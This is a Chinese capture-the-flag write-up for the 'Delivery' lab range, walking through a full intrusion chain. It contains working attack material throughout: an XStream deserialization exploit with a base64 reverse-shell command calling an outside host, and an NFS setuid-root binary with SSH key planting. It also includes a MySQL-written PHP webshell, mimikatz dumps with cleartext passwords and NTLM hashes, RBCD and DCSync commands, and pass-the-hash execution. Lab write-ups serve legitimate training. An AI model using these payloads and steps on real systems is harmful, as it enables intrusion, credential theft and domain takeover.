春秋云镜-Delivery

Delivery

flag1

信息收集

./fsacn -h 39.98.110.215

start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 39.98.110.215    is alive
[*] Icmp alive hosts len is: 1
39.98.110.215:80 open
39.98.110.215:8080 open
39.98.110.215:21 open
39.98.110.215:22 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle: http://39.98.110.215       code:200 len:10918  title:Apache2 Ubuntu Default Page: It works
[+] ftp://39.98.110.215:21:anonymous 
   [->]1.txt
   [->]pom.xml
[*] WebTitle: http://39.98.110.215:8080  code:200 len:3655   title:公司发货单

外网打点

FTP

有个ftp

ftp://39.98.110.215:21:anonymous 

匿名登录

1.txt没东西

查看pom.xml

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>
    <parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>2.7.2</version>
        <relativePath/> <!-- lookup parent from repository -->
    </parent>
    <groupId>com.example</groupId>
    <artifactId>ezjava</artifactId>
    <version>0.0.1-SNAPSHOT</version>
    <name>ezjava</name>
    <description>ezjava</description>
    <properties>
        <java.version>1.8</java.version>
    </properties>
    <dependencies>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-thymeleaf</artifactId>
        </dependency>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
        </dependency>

        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-test</artifactId>
            <scope>test</scope>
        </dependency>

        <dependency>
            <groupId>com.thoughtworks.xstream</groupId>
            <artifactId>xstream</artifactId>
            <version>1.4.16</version>
        </dependency>

        <dependency>
            <groupId>commons-collections</groupId>
            <artifactId>commons-collections</artifactId>
            <version>3.2.1</version>
        </dependency>
    </dependencies>

    <build>
        <plugins>
            <plugin>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-maven-plugin</artifactId>
            </plugin>
        </plugins>
    </build>

</project>

1.4.16的xstream

xstream

直接打XStream 反序列化命令执行漏洞（CVE-2021-29505）

java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC82Mi4yMzQuODIuMTExLzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}"

POST /just_sumbit_it HTTP/1.1
Host: 39.98.110.215:8080
Content-Length: 3115
X-Requested-With: XMLHttpRequest
Accept-Language: zh-CN,zh;q=0.9
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: application/xml;charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Origin: http://39.98.110.215:8080
Referer: http://39.98.110.215:8080/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

<java.util.PriorityQueue serialization='custom'>
    <unserializable-parents/>
    <java.util.PriorityQueue>
        <default>
            <size>2</size>
        </default>
        <int>3</int>
        <javax.naming.ldap.Rdn_-RdnEntry>
            <type>12345</type>
            <value class='com.sun.org.apache.xpath.internal.objects.XString'>
                <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>
            </value>
        </javax.naming.ldap.Rdn_-RdnEntry>
        <javax.naming.ldap.Rdn_-RdnEntry>
            <type>12345</type>
            <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
                <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
                    <parsedMessage>true</parsedMessage>
                    <soapVersion>SOAP_11</soapVersion>
                    <bodyParts/>
                    <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
                        <attachmentsInitialized>false</attachmentsInitialized>
                        <nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
                            <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
                                <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
                                    <names>
                                        <string>aa</string>
                                        <string>aa</string>
                                    </names>
                                    <ctx>
                                        <environment/>
                                        <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
                                            <java.rmi.server.RemoteObject>
                                                <string>UnicastRef</string>
                                                <string>62.234.82.111</string>
                                                <int>1099</int>
                                                <long>0</long>
                                                <int>0</int>
                                                <long>0</long>
                                                <short>0</short>
                                                <boolean>false</boolean>
                                            </java.rmi.server.RemoteObject>
                                        </registry>
                                        <host>62.234.82.111</host>
                                        <port>1099</port>
                                    </ctx>
                                </candidates>
                            </aliases>
                        </nullIter>
                    </sm>
                </message>
            </value>
        </javax.naming.ldap.Rdn_-RdnEntry>
    </java.util.PriorityQueue>
</java.util.PriorityQueue>

flag2&3

上传 fscan 和 Stowaway（比frp好用）

记录一下stowaway用法

• 单层

  • vps ：./linux_x64_admin -l port -s 123 # 123是key，自定义即可

  • 靶机：./linux_x64_agent -c vps_ip:port -s 123 –reconnect 8 # 8秒后重连，不加也可以

  • 靶机执行后在vps上执行use 0,然后socks PORT

  • socks代理就是 vps_ip PORT

• 多层

  假设存在靶机1，2 靶机2存在双网卡（多网卡），靶机1存在外网服务，靶机1和靶机2的网卡A在同一内网，和另一个网卡B不通，目的：访问网卡B的服务

  • 先搭建vps到靶机1的单层代理，参考单层
  • 假设单层代理use 0，在use 0 中 listen，然后选择1，选择监听9999端口。相当于在靶机1上监听9999端口
  • 在靶机2上运行./linux_x64_agent -c 靶机1ip:9999-s 123 –reconnect 8
  • 在vps上显示连接成功后 use 1，然后socks port，这就是新的socks代理

start infoscan
(icmp) Target 172.22.13.14    is alive
(icmp) Target 172.22.13.6     is alive
(icmp) Target 172.22.13.28    is alive
(icmp) Target 172.22.13.57    is alive
[*] Icmp alive hosts len is: 4
172.22.13.28:80 open
172.22.13.57:80 open
172.22.13.57:22 open
172.22.13.14:80 open
172.22.13.14:22 open
172.22.13.14:21 open
172.22.13.6:445 open
172.22.13.6:139 open
172.22.13.28:445 open
172.22.13.28:139 open
172.22.13.6:135 open
172.22.13.28:135 open
172.22.13.14:8080 open
172.22.13.28:8000 open
172.22.13.28:3306 open
172.22.13.6:88 open
[*] alive ports len is: 16
start vulscan
[*] NetInfo:
[*]172.22.13.28
   [->]WIN-HAUWOLAO
   [->]172.22.13.28
[*] NetInfo:
[*]172.22.13.6
   [->]WIN-DC
   [->]172.22.13.6
[*] WebTitle: http://172.22.13.14       code:200 len:10918  title:Apache2 Ubuntu Default Page: It works
[*] NetBios: 172.22.13.6     [+]DC XIAORANG\WIN-DC          
[*] WebTitle: http://172.22.13.28       code:200 len:2525   title:欢迎登录OA办公平台
[*] NetBios: 172.22.13.28    WIN-HAUWOLAO.xiaorang.lab           Windows Server 2016 Datacenter 14393 
[*] WebTitle: http://172.22.13.57       code:200 len:4833   title:Welcome to CentOS
[*] WebTitle: http://172.22.13.28:8000  code:200 len:170    title:Nothing Here.
[+] ftp://172.22.13.14:21:anonymous 
   [->]1.txt
   [->]pom.xml
[*] WebTitle: http://172.22.13.14:8080  code:200 len:3655   title:公司发货单
[+] mysql:172.22.13.28:3306:root 123456

目标

172.22.13.14 入口机

172.22.13.6 DC 域控

172.22.13.28 mysql

172.22.13.57 centos

172.22.13.57

NFS

wget http://archive.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.3.4-2.5ubuntu3_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/libn/libnfsidmap/libnfsidmap2_0.25-5.1ubuntu1_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/libt/libtirpc/libtirpc3_1.2.5-1_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/r/rpcbind/rpcbind_1.2.5-8_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/k/keyutils/keyutils_1.6-6ubuntu1_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/libt/libtirpc/libtirpc-common_1.2.5-1_all.deb
sudo dpkg -i libnfsidmap2_0.25-5.1ubuntu1_amd64.deb && \
sudo dpkg -i libtirpc-common_1.2.5-1_all.deb && \
sudo dpkg -i libtirpc3_1.2.5-1_amd64.deb && \
sudo dpkg -i rpcbind_1.2.5-8_amd64.deb && \
sudo dpkg -i keyutils_1.6-6ubuntu1_amd64.deb && \
sudo dpkg -i nfs-common_1.3.4-2.5ubuntu3_amd64.deb

cd /
mkdir temp
mount -t nfs 172.22.13.57:/ ./temp -o nolock

ssh-keygen -t rsa -b 4096
cd /temp/home/joyce/
mkdir .ssh
cat /cg.pub >> /temp/home/joyce/.ssh/authorized_keys
# 写一个恶意root 到/temp/home/joyce中
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > root.c
gcc root.c -o root
chmod +s root

SSH连接

./root # 即可提权到root
python3 -c 'import pty;pty.spawn("/bin/bash")'
ssh  -i /root/.ssh/id_rsa joyce@172.22.13.57

另一个种读flag方式

find / -user root -perm -4000 -exec ls -ldb {} \;	

有个ftp，但是没权限上传到一开始的ftp上

手动起一个（这里不要在新建的temp目录中 没权限写）

python3 -m pyftpdlib -p 6666 -u test -P test -w &

172.22.13.28

mysql:172.22.13.28:3306:root 123456

172.22.13.28是个mysql弱口令，起一下全局代理用navicat连上去

看了一下secure_file_priv，发现是空的，所以能写马上去

show variables like "secure_file_priv";

日志

show variables like "%general%"

写个马

select "<?php eval($_POST[1]);?>" into outfile "C:/phpstudy_pro/WWW/1.php";

蚁剑连

flag4

172.22.13.6

开始rdp，phpstudy起的服务基本上都是管理员权限

net user dog qwer1234! /add
net localgroup administrators dog /add

用BloodHound发现chenglei这个用户是ACL Admins组，对WIN-DC具有WriteDacl权限,可以打rbcd 或者 dcsync

抓一下hash

直接管理员cmd运行，查看test.txt即可

mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords" "exit" > test.txt

Authentication Id : 0 ; 211625 (00000000:00033aa9)
Session           : Service from 0
User Name         : chenglei
Domain            : XIAORANG
Logon Server      : WIN-DC
Logon Time        : 2025/3/22 17:36:54
SID               : S-1-5-21-3269458654-3569381900-10559451-1105
	msv :	
	 [00000003] Primary
	 * Username : chenglei
	 * Domain   : XIAORANG
	 * NTLM     : 0c00801c30594a1b8eaa889d237c5382
	 * SHA1     : e8848f8a454e08957ec9814b9709129b7101fad7
	 * DPAPI    : 89b179dc738db098372c365602b7b0f4
	tspkg :	
	wdigest :	
	 * Username : chenglei
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : chenglei
	 * Domain   : XIAORANG.LAB
	 * Password : Xt61f3LBhg1
	ssp :	
	credman :	

Username : chenglei

Domain : XIAORANG.LAB

NTLM : 0c00801c30594a1b8eaa889d237c5382

Password : Xt61f3LBhg1

打rbcd

未成功 应该是机器时间问题

proxychains python3 addcomputer.py xiaorang.lab/chenglei:'Xt61f3LBhg1' -dc-ip 172.22.13.6 -dc-host xiaorang.lab -computer-name 'TEST$' -computer-pass 'P@ssw0rd'

proxychains python3 rbcd.py xiaorang.lab/chenglei:'Xt61f3LBhg1' -dc-ip 172.22.13.6 -action write -delegate-to 'WIN-DC$' -delegate-from 'TEST$'

proxychains python3 getST.py xiaorang.lab/'TEST$':'P@ssw0rd' -spn cifs/WIN-DC.xiaorang.lab -impersonate Administrator -dc-ip 172.22.13.6

export KRB5CCNAME=Administrator@cifs_WIN-DC.xiaorang.lab@XIAORANG.LAB.ccache

然后改/etc/hosts把dc加进去，即可无密码连上去

proxychains python3 psexec.py Administrator@WIN-DC.xiaorang.lab -k -no-pass -dc-ip 172.22.13.6

上述未成功 尝试如下 未成功

proxychains python3 psexec.py Administrator@172.22.13.6 -k -no-pass -dc-ip 172.22.13.6

打DCSync

proxychains4 python dacledit.py xiaorang.lab/chenglei -hashes :0c00801c30594a1b8eaa889d237c5382 -action write -rights DCSync -principal chenglei -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.13.6

读hash

proxychains4 python3 secretsdump.py xiaorang.lab/chenglei:Xt61f3LBhg1@172.22.13.6 -just-dc

Administrator:500:aad3b435b51404eeaad3b435b51404ee:6341235defdaed66fb7b682665752c9a:::

proxychains crackmapexec smb 172.22.13.6 -u administrator -H6341235defdaed66fb7b682665752c9a -d xiaorang.lab -x "type Users\Administrator\flag\flag04.txt"